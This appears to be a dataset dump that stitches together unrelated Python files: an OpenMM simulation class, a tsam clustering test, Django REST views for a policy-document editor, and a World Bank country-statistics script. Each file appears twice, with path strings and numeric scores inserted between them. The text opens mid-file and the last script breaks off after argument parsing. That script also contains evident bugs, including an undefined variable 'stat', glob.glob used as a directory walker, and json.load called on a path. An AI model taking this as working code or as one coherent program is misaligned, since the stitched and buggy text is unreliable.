self._simulate(endStep=self.currentStep+steps)
def runForClockTime(self, time, checkpointFile=None, stateFile=None, checkpointInterval=None):
"""Advance the simulation by integrating time steps until a fixed amount of clock time has elapsed.
This is useful when you have a limited amount of computer time available, and want to run the longest simulation
possible in that time. This method will continue taking time steps until the specified clock time has elapsed,
then return. It also can automatically write out a checkpoint and/or state file before returning, so you can
later resume the simulation. Another option allows it to write checkpoints or states at regular intervals, so
you can resume even if the simulation is interrupted before the time limit is reached.
Parameters
----------
time : time
the amount of time to run for. If no units are specified, it is
assumed to be a number of hours.
checkpointFile : string or file=None
if specified, a checkpoint file will be written at the end of the
simulation (and optionally at regular intervals before then) by
passing this to saveCheckpoint().
stateFile : string or file=None
if specified, a state file will be written at the end of the
simulation (and optionally at regular intervals before then) by
passing this to saveState().
checkpointInterval : time=None
if specified, checkpoints and/or states will be written at regular
intervals during the simulation, in addition to writing a final
version at the end. If no units are specified, this is assumed to
be in hours.
"""
if unit.is_quantity(time):
time = time.value_in_unit(unit.hours)
if unit.is_quantity(checkpointInterval):
checkpointInterval = checkpointInterval.value_in_unit(unit.hours)
endTime = datetime.now()+timedelta(hours=time)
while (datetime.now() < endTime):
if checkpointInterval is None:
nextTime = endTime
else:
nextTime = datetime.now()+timedelta(hours=checkpointInterval)
if nextTime > endTime:
nextTime = endTime
self._simulate(endTime=nextTime)
if checkpointFile is not None:
self.saveCheckpoint(checkpointFile)
if stateFile is not None:
self.saveState(stateFile)
def _simulate(self, endStep=None, endTime=None):
if endStep is None:
endStep = sys.maxsize
nextReport = [None]*len(self.reporters)
while self.currentStep < endStep and (endTime is None or datetime.now() < endTime):
nextSteps = endStep-self.currentStep
# Find when the next report will happen.
anyReport = False
for i, reporter in enumerate(self.reporters):
nextReport[i] = reporter.describeNextReport(self)
if nextReport[i][0] > 0 and nextReport[i][0] <= nextSteps:
nextSteps = nextReport[i][0]
anyReport = True
stepsToGo = nextSteps
while stepsToGo > 10:
self.integrator.step(10) # Only take 10 steps at a time, to give Python more chances to respond to a control-c.
stepsToGo -= 10
self.currentStep += 10
if endTime is not None and datetime.now() >= endTime:
return
self.integrator.step(stepsToGo)
self.currentStep += stepsToGo
if anyReport:
# One or more reporters are ready to generate reports. Organize them into three
# groups: ones that want wrapped positions, ones that want unwrapped positions,
# and ones that don't care about positions.
wrapped = []
unwrapped = []
either = []
for reporter, report in zip(self.reporters, nextReport):
if report[0] == nextSteps:
if len(report) > 5:
wantWrap = report[5]
if wantWrap is None:
wantWrap = self._usesPBC
else:
wantWrap = self._usesPBC
if not report[1]:
either.append((reporter, report))
elif wantWrap:
wrapped.append((reporter, report))
else:
unwrapped.append((reporter, report))
if len(wrapped) > len(unwrapped):
wrapped += either
else:
unwrapped += either
# Generate the reports.
if len(wrapped) > 0:
self._generate_reports(wrapped, True)
if len(unwrapped) > 0:
self._generate_reports(unwrapped, False)
def _generate_reports(self, reports, periodic):
getPositions = False
getVelocities = False
getForces = False
getEnergy = False
for reporter, next in reports:
if next[1]:
getPositions = True
if next[2]:
getVelocities = True
if next[3]:
getForces = True
if next[4]:
getEnergy = True
state = self.context.getState(getPositions=getPositions, getVelocities=getVelocities, getForces=getForces,
getEnergy=getEnergy, getParameters=True, enforcePeriodicBox=periodic)
for reporter, next in reports:
reporter.report(self, state)
def saveCheckpoint(self, file):
"""Save a checkpoint of the simulation to a file.
The output is a binary file that contains a complete representation of the current state of the Simulation.
It includes both publicly visible data such as the particle positions and velocities, and also internal data
such as the states of random number generators. Reloading the checkpoint will put the Simulation back into
precisely the same state it had before, so it can be exactly continued.
A checkpoint file is highly specific to the Simulation it was created from. It can only be loaded into
another Simulation that has an identical System, uses the same Platform and OpenMM version, and is running on
identical hardware. If you need a more portable way to resume simulations, consider using saveState() instead.
Parameters
----------
file : string or file
a File-like object to write the checkpoint to, or alternatively a
filename
"""
if isinstance(file, str):
with open(file, 'wb') as f:
f.write(self.context.createCheckpoint())
else:
file.write(self.context.createCheckpoint())
def loadCheckpoint(self, file):
"""Load a checkpoint file that was created with saveCheckpoint().
Parameters
----------
file : string or file
a File-like object to load the checkpoint from, or alternatively a
filename
"""
if isinstance(file, str):
with open(file, 'rb') as f:
self.context.loadCheckpoint(f.read())
else:
self.context.loadCheckpoint(file.read())
def saveState(self, file):
"""Save the current state of the simulation to a file.
The output is an XML file containing a serialized State object. It includes all publicly visible data,
including positions, velocities, and parameters. Reloading the State will put the Simulation back into
approximately the same state it had before.
Unlike saveCheckpoint(), this does not store internal data such as the states of random number generators.
Therefore, you should not expect the following trajectory to be identical to what would have been produced
with the original Simulation. On the other hand, this means it is portable across different Platforms or
hardware.
Parameters
----------
file : string or file
a File-like object to write the state to, or alternatively a
filename
"""
state = self.context.getState(getPositions=True, getVelocities=True, getParameters=True)
xml = mm.XmlSerializer.serialize(state)
if isinstance(file, str):
with open(file, 'w') as f:
f.write(xml)
else:
file.write(xml)
def loadState(self, file):
"""Load a State file that was created with saveState().
Parameters
----------
file : string or file
a File-like object to load the state from, or alternatively a
filename
"""
if isinstance(file, str):
with open(file, 'r') as f:
xml = f.read()
else:
xml = file.read()
self.context.setState(mm.XmlSerializer.deserialize(xml)) | 3rdparty/openmm/wrappers/python/simtk/openmm/app/simulation.py | from __future__ import absolute_import
__author__ = "<NAME>"
__version__ = "1.0"
import simtk.openmm as mm
import simtk.unit as unit
import sys
from datetime import datetime, timedelta
try:
string_types = (unicode, str)
except NameError:
string_types = (str,)
class Simulation(object):
"""Simulation provides a simplified API for running simulations with OpenMM and reporting results.
A Simulation ties together various objects used for running a simulation: a Topology, System,
Integrator, and Context. To use it, you provide the Topology, System, and Integrator, and it
creates the Context automatically.
Simulation also maintains a list of "reporter" objects that record or analyze data as the simulation
runs, such as writing coordinates to files or displaying structures on the screen. For example,
the following line will cause a file called "output.pdb" to be created, and a structure written to
it every 1000 time steps:
simulation.reporters.append(PDBReporter('output.pdb', 1000))
"""
def __init__(self, topology, system, integrator, platform=None, platformProperties=None, state=None):
"""Create a Simulation.
Parameters
----------
topology : Topology
A Topology describing the the system to simulate
system : System or XML file name
The OpenMM System object to simulate (or the name of an XML file
with a serialized System)
integrator : Integrator or XML file name
The OpenMM Integrator to use for simulating the System (or the name
of an XML file with a serialized System)
platform : Platform=None
If not None, the OpenMM Platform to use
platformProperties : map=None
If not None, a set of platform-specific properties to pass to the
Context's constructor
state : XML file name=None
The name of an XML file containing a serialized State. If not None,
the information stored in state will be transferred to the generated
Simulation object.
"""
self.topology = topology
## The System being simulated
if isinstance(system, string_types):
with open(system, 'r') as f:
self.system = mm.XmlSerializer.deserialize(f.read())
else:
self.system = system
## The Integrator used to advance the simulation
if isinstance(integrator, string_types):
with open(integrator, 'r') as f:
self.integrator = mm.XmlSerializer.deserialize(f.read())
else:
self.integrator = integrator
## The index of the current time step
self.currentStep = 0
## A list of reporters to invoke during the simulation
self.reporters = []
if platform is None:
## The Context containing the current state of the simulation
self.context = mm.Context(self.system, self.integrator)
elif platformProperties is None:
self.context = mm.Context(self.system, self.integrator, platform)
else:
self.context = mm.Context(self.system, self.integrator, platform, platformProperties)
if state is not None:
with open(state, 'r') as f:
self.context.setState(mm.XmlSerializer.deserialize(f.read()))
## Determines whether or not we are using PBC. Try from the System first,
## fall back to Topology if that doesn't work
try:
self._usesPBC = self.system.usesPeriodicBoundaryConditions()
except Exception: # OpenMM just raises Exception if it's not implemented everywhere
self._usesPBC = topology.getUnitCellDimensions() is not None
def minimizeEnergy(self, tolerance=10*unit.kilojoule/unit.mole, maxIterations=0):
"""Perform a local energy minimization on the system.
Parameters
----------
tolerance : energy=10*kilojoules/mole
The energy tolerance to which the system should be minimized
maxIterations : int=0
The maximum number of iterations to perform. If this is 0,
minimization is continued until the results converge without regard
to how many iterations it takes.
"""
mm.LocalEnergyMinimizer.minimize(self.context, tolerance, maxIterations)
def step(self, steps):
"""Advance the simulation by integrating a specified number of time steps."""
self._simulate(endStep=self.currentStep+steps)
def runForClockTime(self, time, checkpointFile=None, stateFile=None, checkpointInterval=None):
"""Advance the simulation by integrating time steps until a fixed amount of clock time has elapsed.
This is useful when you have a limited amount of computer time available, and want to run the longest simulation
possible in that time. This method will continue taking time steps until the specified clock time has elapsed,
then return. It also can automatically write out a checkpoint and/or state file before returning, so you can
later resume the simulation. Another option allows it to write checkpoints or states at regular intervals, so
you can resume even if the simulation is interrupted before the time limit is reached.
Parameters
----------
time : time
the amount of time to run for. If no units are specified, it is
assumed to be a number of hours.
checkpointFile : string or file=None
if specified, a checkpoint file will be written at the end of the
simulation (and optionally at regular intervals before then) by
passing this to saveCheckpoint().
stateFile : string or file=None
if specified, a state file will be written at the end of the
simulation (and optionally at regular intervals before then) by
passing this to saveState().
checkpointInterval : time=None
if specified, checkpoints and/or states will be written at regular
intervals during the simulation, in addition to writing a final
version at the end. If no units are specified, this is assumed to
be in hours.
"""
if unit.is_quantity(time):
time = time.value_in_unit(unit.hours)
if unit.is_quantity(checkpointInterval):
checkpointInterval = checkpointInterval.value_in_unit(unit.hours)
endTime = datetime.now()+timedelta(hours=time)
while (datetime.now() < endTime):
if checkpointInterval is None:
nextTime = endTime
else:
nextTime = datetime.now()+timedelta(hours=checkpointInterval)
if nextTime > endTime:
nextTime = endTime
self._simulate(endTime=nextTime)
if checkpointFile is not None:
self.saveCheckpoint(checkpointFile)
if stateFile is not None:
self.saveState(stateFile)
def _simulate(self, endStep=None, endTime=None):
if endStep is None:
endStep = sys.maxsize
nextReport = [None]*len(self.reporters)
while self.currentStep < endStep and (endTime is None or datetime.now() < endTime):
nextSteps = endStep-self.currentStep
# Find when the next report will happen.
anyReport = False
for i, reporter in enumerate(self.reporters):
nextReport[i] = reporter.describeNextReport(self)
if nextReport[i][0] > 0 and nextReport[i][0] <= nextSteps:
nextSteps = nextReport[i][0]
anyReport = True
stepsToGo = nextSteps
while stepsToGo > 10:
self.integrator.step(10) # Only take 10 steps at a time, to give Python more chances to respond to a control-c.
stepsToGo -= 10
self.currentStep += 10
if endTime is not None and datetime.now() >= endTime:
return
self.integrator.step(stepsToGo)
self.currentStep += stepsToGo
if anyReport:
# One or more reporters are ready to generate reports. Organize them into three
# groups: ones that want wrapped positions, ones that want unwrapped positions,
# and ones that don't care about positions.
wrapped = []
unwrapped = []
either = []
for reporter, report in zip(self.reporters, nextReport):
if report[0] == nextSteps:
if len(report) > 5:
wantWrap = report[5]
if wantWrap is None:
wantWrap = self._usesPBC
else:
wantWrap = self._usesPBC
if not report[1]:
either.append((reporter, report))
elif wantWrap:
wrapped.append((reporter, report))
else:
unwrapped.append((reporter, report))
if len(wrapped) > len(unwrapped):
wrapped += either
else:
unwrapped += either
# Generate the reports.
if len(wrapped) > 0:
self._generate_reports(wrapped, True)
if len(unwrapped) > 0:
self._generate_reports(unwrapped, False)
def _generate_reports(self, reports, periodic):
getPositions = False
getVelocities = False
getForces = False
getEnergy = False
for reporter, next in reports:
if next[1]:
getPositions = True
if next[2]:
getVelocities = True
if next[3]:
getForces = True
if next[4]:
getEnergy = True
state = self.context.getState(getPositions=getPositions, getVelocities=getVelocities, getForces=getForces,
getEnergy=getEnergy, getParameters=True, enforcePeriodicBox=periodic)
for reporter, next in reports:
reporter.report(self, state)
def saveCheckpoint(self, file):
"""Save a checkpoint of the simulation to a file.
The output is a binary file that contains a complete representation of the current state of the Simulation.
It includes both publicly visible data such as the particle positions and velocities, and also internal data
such as the states of random number generators. Reloading the checkpoint will put the Simulation back into
precisely the same state it had before, so it can be exactly continued.
A checkpoint file is highly specific to the Simulation it was created from. It can only be loaded into
another Simulation that has an identical System, uses the same Platform and OpenMM version, and is running on
identical hardware. If you need a more portable way to resume simulations, consider using saveState() instead.
Parameters
----------
file : string or file
a File-like object to write the checkpoint to, or alternatively a
filename
"""
if isinstance(file, str):
with open(file, 'wb') as f:
f.write(self.context.createCheckpoint())
else:
file.write(self.context.createCheckpoint())
def loadCheckpoint(self, file):
"""Load a checkpoint file that was created with saveCheckpoint().
Parameters
----------
file : string or file
a File-like object to load the checkpoint from, or alternatively a
filename
"""
if isinstance(file, str):
with open(file, 'rb') as f:
self.context.loadCheckpoint(f.read())
else:
self.context.loadCheckpoint(file.read())
def saveState(self, file):
"""Save the current state of the simulation to a file.
The output is an XML file containing a serialized State object. It includes all publicly visible data,
including positions, velocities, and parameters. Reloading the State will put the Simulation back into
approximately the same state it had before.
Unlike saveCheckpoint(), this does not store internal data such as the states of random number generators.
Therefore, you should not expect the following trajectory to be identical to what would have been produced
with the original Simulation. On the other hand, this means it is portable across different Platforms or
hardware.
Parameters
----------
file : string or file
a File-like object to write the state to, or alternatively a
filename
"""
state = self.context.getState(getPositions=True, getVelocities=True, getParameters=True)
xml = mm.XmlSerializer.serialize(state)
if isinstance(file, str):
with open(file, 'w') as f:
f.write(xml)
else:
file.write(xml)
def loadState(self, file):
"""Load a State file that was created with saveState().
Parameters
----------
file : string or file
a File-like object to load the state from, or alternatively a
filename
"""
if isinstance(file, str):
with open(file, 'r') as f:
xml = f.read()
else:
xml = file.read()
self.context.setState(mm.XmlSerializer.deserialize(xml)) | 0.648911 | 0.416381 |
import os
import time
import pandas as pd
import numpy as np
import tsam.timeseriesaggregation as tsam
def test_cluster_order():
raw = pd.read_csv(os.path.join(os.path.dirname(__file__),'..','examples','testdata.csv'), index_col = 0)
raw_wind = raw.loc[:, 'Wind'].to_frame()
orig_raw_predefClusterOrder = pd.read_csv(os.path.join(os.path.dirname(__file__),'..','examples','results','testperiods_predefClusterOrder.csv'), index_col = [0,1])
orig_raw_predefClusterOrderAndClusterCenters = pd.read_csv(os.path.join(os.path.dirname(__file__), '..', 'examples', 'results', 'testperiods_predefClusterOrderAndClusterCenters.csv'),index_col=[0, 1])
starttime = time.time()
aggregation_wind = tsam.TimeSeriesAggregation(raw_wind, noTypicalPeriods = 8, hoursPerPeriod = 24,
clusterMethod = 'hierarchical')
typPeriods_wind = aggregation_wind.createTypicalPeriods()
aggregation_predefClusterOrder = tsam.TimeSeriesAggregation(raw, noTypicalPeriods=8, hoursPerPeriod=24,
clusterMethod='hierarchical',
predefClusterOrder=aggregation_wind.clusterOrder)
typPeriods_predefClusterOrder = aggregation_predefClusterOrder.createTypicalPeriods()
aggregation_predefClusterOrderAndClusterCenters = tsam.TimeSeriesAggregation(raw,
noTypicalPeriods=8, hoursPerPeriod=24,
clusterMethod='hierarchical',
predefClusterOrder=aggregation_wind.clusterOrder,
predefClusterCenterIndices=aggregation_wind.clusterCenterIndices)
typPeriods_predefClusterOrderAndClusterCenters = aggregation_predefClusterOrderAndClusterCenters.createTypicalPeriods()
print('Clustering took ' + str(time.time() - starttime))
# sort the typical days in order to avoid error assertion due to different order
sortedDaysOrig1 = orig_raw_predefClusterOrder.sum(axis=0,level=0).sort_values('GHI').index
sortedDaysTest1 = typPeriods_predefClusterOrder.sum(axis=0,level=0).sort_values('GHI').index
sortedDaysOrig2 = orig_raw_predefClusterOrderAndClusterCenters.sum(axis=0,level=0).sort_values('GHI').index
sortedDaysTest2 = typPeriods_predefClusterOrderAndClusterCenters.sum(axis=0,level=0).sort_values('GHI').index
# rearange their order
orig1 = orig_raw_predefClusterOrder[typPeriods_predefClusterOrder.columns].unstack().loc[sortedDaysOrig1,:].stack()
test1 = typPeriods_predefClusterOrder.unstack().loc[sortedDaysTest1,:].stack()
orig2 = orig_raw_predefClusterOrderAndClusterCenters[typPeriods_predefClusterOrderAndClusterCenters.columns].unstack().loc[sortedDaysOrig2,:].stack()
test2 = typPeriods_predefClusterOrderAndClusterCenters.unstack().loc[sortedDaysTest2,:].stack()
np.testing.assert_array_almost_equal(orig1.values, test1[orig1.columns].values,decimal=4)
np.testing.assert_array_almost_equal(orig2.values, test2[orig2.columns].values, decimal=4)
if __name__ == "__main__":
test_cluster_order() | test/test_cluster_order.py | import os
import time
import pandas as pd
import numpy as np
import tsam.timeseriesaggregation as tsam
def test_cluster_order():
raw = pd.read_csv(os.path.join(os.path.dirname(__file__),'..','examples','testdata.csv'), index_col = 0)
raw_wind = raw.loc[:, 'Wind'].to_frame()
orig_raw_predefClusterOrder = pd.read_csv(os.path.join(os.path.dirname(__file__),'..','examples','results','testperiods_predefClusterOrder.csv'), index_col = [0,1])
orig_raw_predefClusterOrderAndClusterCenters = pd.read_csv(os.path.join(os.path.dirname(__file__), '..', 'examples', 'results', 'testperiods_predefClusterOrderAndClusterCenters.csv'),index_col=[0, 1])
starttime = time.time()
aggregation_wind = tsam.TimeSeriesAggregation(raw_wind, noTypicalPeriods = 8, hoursPerPeriod = 24,
clusterMethod = 'hierarchical')
typPeriods_wind = aggregation_wind.createTypicalPeriods()
aggregation_predefClusterOrder = tsam.TimeSeriesAggregation(raw, noTypicalPeriods=8, hoursPerPeriod=24,
clusterMethod='hierarchical',
predefClusterOrder=aggregation_wind.clusterOrder)
typPeriods_predefClusterOrder = aggregation_predefClusterOrder.createTypicalPeriods()
aggregation_predefClusterOrderAndClusterCenters = tsam.TimeSeriesAggregation(raw,
noTypicalPeriods=8, hoursPerPeriod=24,
clusterMethod='hierarchical',
predefClusterOrder=aggregation_wind.clusterOrder,
predefClusterCenterIndices=aggregation_wind.clusterCenterIndices)
typPeriods_predefClusterOrderAndClusterCenters = aggregation_predefClusterOrderAndClusterCenters.createTypicalPeriods()
print('Clustering took ' + str(time.time() - starttime))
# sort the typical days in order to avoid error assertion due to different order
sortedDaysOrig1 = orig_raw_predefClusterOrder.sum(axis=0,level=0).sort_values('GHI').index
sortedDaysTest1 = typPeriods_predefClusterOrder.sum(axis=0,level=0).sort_values('GHI').index
sortedDaysOrig2 = orig_raw_predefClusterOrderAndClusterCenters.sum(axis=0,level=0).sort_values('GHI').index
sortedDaysTest2 = typPeriods_predefClusterOrderAndClusterCenters.sum(axis=0,level=0).sort_values('GHI').index
# rearange their order
orig1 = orig_raw_predefClusterOrder[typPeriods_predefClusterOrder.columns].unstack().loc[sortedDaysOrig1,:].stack()
test1 = typPeriods_predefClusterOrder.unstack().loc[sortedDaysTest1,:].stack()
orig2 = orig_raw_predefClusterOrderAndClusterCenters[typPeriods_predefClusterOrderAndClusterCenters.columns].unstack().loc[sortedDaysOrig2,:].stack()
test2 = typPeriods_predefClusterOrderAndClusterCenters.unstack().loc[sortedDaysTest2,:].stack()
np.testing.assert_array_almost_equal(orig1.values, test1[orig1.columns].values,decimal=4)
np.testing.assert_array_almost_equal(orig2.values, test2[orig2.columns].values, decimal=4)
if __name__ == "__main__":
test_cluster_order() | 0.31785 | 0.274655 |
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from rest_framework import status
from rest_framework.generics import GenericAPIView
from rest_framework.parsers import JSONParser
from rest_framework.renderers import BrowsableAPIRenderer, JSONRenderer
from rest_framework.response import Response
from document.models import DocNode
from document.parsers import AkomaNtosoParser
from document.renderers import AkomaNtosoRenderer, BrowsableAkomaNtosoRenderer
from document.serializers.doc_cursor import DocCursorSerializer
from document.tree import DocCursor
from reqs.views.policies import policy_or_404
class TreeView(GenericAPIView):
serializer_class = DocCursorSerializer
renderer_classes = (JSONRenderer, BrowsableAPIRenderer,
AkomaNtosoRenderer, BrowsableAkomaNtosoRenderer)
parser_classes = (JSONParser, AkomaNtosoParser)
queryset = DocNode.objects.none() # Used to determine permissions
def get_object(self, prefetch_related=True):
only_published = not self.request.user.is_authenticated
policy = policy_or_404(self.kwargs['policy_id'], only_published)
# we'll pass this policy down when we serialize
self.policy = policy
query_args = {'policy_id': policy.pk}
if self.kwargs.get('identifier'):
query_args['identifier'] = self.kwargs['identifier']
else:
query_args['depth'] = 0
queryset = DocNode.objects
if prefetch_related:
queryset = queryset.prefetch_annotations()
root_doc = get_object_or_404(queryset, **query_args)
root = DocCursor.load_from_model(root_doc, subtree=False)
if prefetch_related:
root.add_models(root_doc.descendants().prefetch_annotations())
self.check_object_permissions(self.request, root)
return root
def get_serializer_context(self):
return {
'policy': getattr(self, 'policy', None),
}
def get(self, request, *args, **kwargs):
instance = self.get_object(prefetch_related=True)
serializer = self.get_serializer(instance)
return Response(serializer.data)
def put(self, request, *args, **kwargs):
if self.kwargs.get('identifier'):
return Response({
'detail': 'Identifiers are unsupported on PUT requests.',
}, status=status.HTTP_400_BAD_REQUEST)
# We don't care about prefetching related data because we're
# about to delete all of it anyways.
instance = self.get_object(prefetch_related=False)
serializer = self.get_serializer(instance, data=request.data)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(status=status.HTTP_204_NO_CONTENT)
def render_editor(request, policy_id, filename, title):
# Verify that the policy is valid; 404 when not. We don't actually load
# the document content as they'll be retrieved from the API
policy_or_404(policy_id, only_published=False)
return render(request, filename, {
'document_url': reverse('document', kwargs={'policy_id': policy_id}),
'title': title,
})
@login_required
def editor(request, policy_id):
return render_editor(request, policy_id, 'document/editor.html',
'Document Editor')
@login_required
def editor_akn(request, policy_id):
return render_editor(request, policy_id, 'document/editor_akn.html',
'Akoma Ntoso Editor') | api/document/views.py | from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from rest_framework import status
from rest_framework.generics import GenericAPIView
from rest_framework.parsers import JSONParser
from rest_framework.renderers import BrowsableAPIRenderer, JSONRenderer
from rest_framework.response import Response
from document.models import DocNode
from document.parsers import AkomaNtosoParser
from document.renderers import AkomaNtosoRenderer, BrowsableAkomaNtosoRenderer
from document.serializers.doc_cursor import DocCursorSerializer
from document.tree import DocCursor
from reqs.views.policies import policy_or_404
class TreeView(GenericAPIView):
serializer_class = DocCursorSerializer
renderer_classes = (JSONRenderer, BrowsableAPIRenderer,
AkomaNtosoRenderer, BrowsableAkomaNtosoRenderer)
parser_classes = (JSONParser, AkomaNtosoParser)
queryset = DocNode.objects.none() # Used to determine permissions
def get_object(self, prefetch_related=True):
only_published = not self.request.user.is_authenticated
policy = policy_or_404(self.kwargs['policy_id'], only_published)
# we'll pass this policy down when we serialize
self.policy = policy
query_args = {'policy_id': policy.pk}
if self.kwargs.get('identifier'):
query_args['identifier'] = self.kwargs['identifier']
else:
query_args['depth'] = 0
queryset = DocNode.objects
if prefetch_related:
queryset = queryset.prefetch_annotations()
root_doc = get_object_or_404(queryset, **query_args)
root = DocCursor.load_from_model(root_doc, subtree=False)
if prefetch_related:
root.add_models(root_doc.descendants().prefetch_annotations())
self.check_object_permissions(self.request, root)
return root
def get_serializer_context(self):
return {
'policy': getattr(self, 'policy', None),
}
def get(self, request, *args, **kwargs):
instance = self.get_object(prefetch_related=True)
serializer = self.get_serializer(instance)
return Response(serializer.data)
def put(self, request, *args, **kwargs):
if self.kwargs.get('identifier'):
return Response({
'detail': 'Identifiers are unsupported on PUT requests.',
}, status=status.HTTP_400_BAD_REQUEST)
# We don't care about prefetching related data because we're
# about to delete all of it anyways.
instance = self.get_object(prefetch_related=False)
serializer = self.get_serializer(instance, data=request.data)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(status=status.HTTP_204_NO_CONTENT)
def render_editor(request, policy_id, filename, title):
# Verify that the policy is valid; 404 when not. We don't actually load
# the document content as they'll be retrieved from the API
policy_or_404(policy_id, only_published=False)
return render(request, filename, {
'document_url': reverse('document', kwargs={'policy_id': policy_id}),
'title': title,
})
@login_required
def editor(request, policy_id):
return render_editor(request, policy_id, 'document/editor.html',
'Document Editor')
@login_required
def editor_akn(request, policy_id):
return render_editor(request, policy_id, 'document/editor_akn.html',
'Akoma Ntoso Editor') | 0.558809 | 0.12166 |
import json, glob, os
import logging
import pandas as pd
import world_bank_data as wb
import netCDF4 as nc
countrymasks = os.path.dirname(__file__)
country_data_path = os.path.join(countrymasks, 'country_data')
datasets = os.path.join(countrymasks, 'datasets')
class Variable:
def __init__(self, type, label, unit, wdi_code=None, un_code=None, alias=None, wdi_scale=1):
self.type = type
self.label = label
self.alias = alias or type.lower()
self.unit = unit
self.wdi_code = wdi_code
self.wdi_scale = wdi_scale
self.un_code = un_code
self._wdi = None
self._un = None
def load_wdi(self):
if not self.wdi_code:
raise ValueError('{}: no associated WDI variable'.format(self.label))
fname = os.path.join(datasets, 'wdi', self.wdi_code+'.csv')
try:
timeseries = pd.read_csv(fname, index_col=('Country','Year'))[self.wdi_code]
except:
# NOTE: mrv=1 for most recent value would be equivalent to subsequent treatment
# ....: except that sometimes it results to NaN (e.g CO2 emissions for PSE, Palestine)
timeseries = wb.get_series(self.wdi_code, id_or_value='id', simplify_index=True)
timeseries.to_csv(fname)
return timeseries
# lazy loading
@property
def wdi(self):
if self._wdi is None:
self._wdi = self.load_wdi()
return self._wdi
@property
def un(self):
if not self.un_code:
raise ValueError('{}: no associated UN variable'.format(self.label))
if self._un is None:
self._un = json.load(os.path.join(datasets, 'countryprofiledata.json'))
return self._un
def get_wdi(self, country_code):
try:
value = self.wdi.loc[country_code].dropna().values[-1]*self.wdi_scale
except:
value = float('nan')
logging.warning('no valid WDI value for {},{}'.format(country_code, self.wdi_code))
return value
def get_un(self, country_code):
try:
return self.un[country_code][self.un_code]
except:
logging.warning('no valid UN value for {},{}'.format(country_code, self.un_code))
return float('nan')
def get(self, country_code):
if self.wdi_code:
return self.get_wdi(country_code)
elif self.un_code:
return self.get_un(country_code)
raise ValueError('no method provided')
def to_dict(self, value, rank=None):
return {
'type': self.type,
'label': self.label,
'unit': self.unit,
'value': value,
'rank': rank,
'un_code': self.un_code,
'wdi_code': self.wdi_code,
}
# https://data.worldbank.org/indicator/AG.SRF.TOTL.K2
# AG.LND.TOTL.K2 : land area !
stats_variables = [
Variable('POP_TOTL', label='Total population', unit='million people', alias='pop_total', wdi_code='SP.POP.TOTL', wdi_scale=1e-6),
Variable('POP_DNST', label='Population density', unit='people/sq. km', alias='pop_density', wdi_code='EN.POP.DNST'),
Variable('RUR_POP_PRCT', label='Rural population', unit='% of total population', alias='pop_rural', wdi_code='SP.RUR.TOTL.ZS'),
Variable('URB_POP_PRCT', label='Urban population', unit='% of total population', alias='pop_urban', wdi_code='SP.URB.TOTL.IN.ZS'),
Variable('POP_GROWTH', label='Population growth', unit='% per year', alias='pop_growth', wdi_code='SP.POP.GROW'),
Variable('SURFACE_AREA', label='Surface area', unit='sq. km', alias='area', wdi_code='AG.SRF.TOTL.K2'),
Variable('GDP_PPP', label='Gross Domestic Product, PPP', unit='billion $ (PPP, current)', alias='gdp_ppp', wdi_code='NY.GDP.MKTP.PP.CD', wdi_scale=1e-9),
Variable('GDP_PER_CAPITA_PPP', label='GDP per capita, PPP', unit='$ (PPP, current)', alias='gdp_capita_ppp', wdi_code='NY.GDP.PCAP.PP.CD'),
Variable('GDP', label='Gross Domestic Product', unit='billion $ (current)', alias='gdp', wdi_code='NY.GDP.MKTP.CD', wdi_scale=1e-9),
Variable('GDP_PER_CAPITA', label='GDP per capita', unit='$ (current)', alias='gdp_capita', wdi_code='NY.GDP.PCAP.CD'),
Variable('GDP_GROWTH', label='GDP growth', unit='annual %', alias='gdp_growth', wdi_code='NY.GDP.MKTP.KD.ZG'),
Variable('POV_DDAY', label='Poverty headcount rank at $ 1.90 a day (2011 PPP)', unit='% of total population', alias='poverty', wdi_code='SI.POV.DDAY'),
# Variable('CO2_EM_CAPITA', label='CO2 emissions per capita', unit='metric tons/capita', alias='co2_capita', wdi_code='EM.ATM.CO2E.PC'),
Variable('CO2_EM', label='CO2 emissions', unit='kt', alias='co2', wdi_code='EN.ATM.CO2E.KT'),
Variable('CO2_EM_INTENSITY', label='CO2 intensity', unit='kg per kg of oil equivalent energy use', wdi_code='EN.ATM.CO2E.EG.ZS'),
Variable('CO2_EM_GDP', label='CO2 emissions per GDP', unit='kg per 2011 PPP $ of GDP', wdi_code='EN.ATM.CO2E.PP.GD.KD'),
Variable('HDI', label='Human Development Index', unit='(-)', un_code='HDI_Human_development_index_HDIg_value'),
]
class CountryStats:
"""This is the class for the corresponding json file in country_data
"""
def __init__(self, name, type="country", sub_countries=[], code=None, stats=None):
self.name = name
self.type = type
self.code = code
self.sub_countries = sub_countries
self.stats = stats or []
def get(self, name, insert=False):
try:
i = [e['type'] for e in self.stats].index(name)
return self.stats[i]
except ValueError:
if insert:
e = {'type': name}
self.stats.append(e)
return e
else:
raise
def getvalue(self, name, missing=float('nan')):
try:
return self.get(name)['value']
except ValueError:
return missing
@classmethod
def load(cls, fname):
js = json.load(open(fname))
code = os.path.basename(os.path.dirname(fname))
return cls(js['name'], js.get('type', 'country'), js.get('sub-countries',[]), code=js.get('code', code), stats=js.get('stats', []))
def save(self, fname):
cdir = os.path.dirname(fname)
if not os.path.exists(cdir):
logging.info('create '+repr(cdir))
os.makedirs(cdir)
js = {
'name': self.name,
'code': self.code,
'type': self.type,
'sub-countries': self.sub_countries,
'stats': self.stats,
}
json.dump(js, open(fname, 'w'))
def __repr__(self):
return 'CountryStats({name}, {code})'.format(**vars(self))
class CountryStatDB:
def __init__(self, countries=None):
self.countries = countries or {}
@staticmethod
def cpath(code):
return os.path.join(country_data_path, code, '{}_general.json'.format(code))
@classmethod
def load(cls):
db = cls()
for root, codes, _ in glob.glob(country_data_path):
break
for c in codes:
cpath = os.path.join(country_data_path, c, '{}_general.json'.format(c))
try:
cstat = CountryStats.load(cpath)
except Exception as error:
logging.warning(str(error))
continue
db.countries[c] = stat
return db
def save(self):
for c, cstat in self.countries.items():
cpath = self.cpath(c)
cstat.save(cpath)
def main():
import argparse
parser = argparse.ArgumentParser()
x = parser.add_mutually_exclusive_group()
x.add_argument('--countries', nargs='+')
x.add_argument('--folder', action='store_true', help='read country codes from country_data folder')
# x.add_argument('--netcdf', '--nc', action='store_true', help='read country codes from default countrymasks.nc')
x.add_argument('--mask-file', help='read country code from netcdf mask file')
# x.add_argument('--shape-file', help='read country code from geojson shape file')
o = parser.parse_args()
wbcountries = wb.get_countries()
